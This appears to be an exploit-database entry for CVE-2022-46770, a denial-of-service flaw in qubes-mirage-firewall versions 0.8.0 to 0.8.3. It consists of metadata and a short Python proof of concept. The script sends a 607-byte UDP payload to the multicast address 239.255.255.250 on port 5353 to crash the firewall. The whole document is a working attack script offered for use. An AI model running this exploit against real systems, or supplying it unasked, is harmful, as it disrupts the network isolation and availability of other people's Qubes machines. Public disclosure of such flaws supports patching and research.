qubes-mirage-firewall v0.8.3 - Denial Of Service Exploit CVE-2022-46770

Name: qubes-mirage-firewall v0.8.3 - Denial Of Service Exploit CVE-2022-46770
Rating: 5 (77 reviews)

2023-03-31 | CVSS 5.0

## https://sploitus.com/exploit?id=1337DAY-ID-38401
# Exploit Title: qubes-mirage-firewall  v0.8.3 - Denial Of Service (DoS)
# Exploit Author: Krzysztof Burghardt <[email protected]>
# Vendor Homepage: https://mirage.io/blog/MSA03
# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases
# Version: >= 0.8.0 & < 0.8.4
# Tested on: Qubes OS
# CVE: CVE-2022-46770

#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166

#!/usr/bin/env python3

from socket import socket, AF_INET, SOCK_DGRAM

TARGET = "239.255.255.250"

PORT = 5353

PAYLOAD = b'a' * 607

s = socket(AF_INET, SOCK_DGRAM)

s.sendto(PAYLOAD, (TARGET, PORT))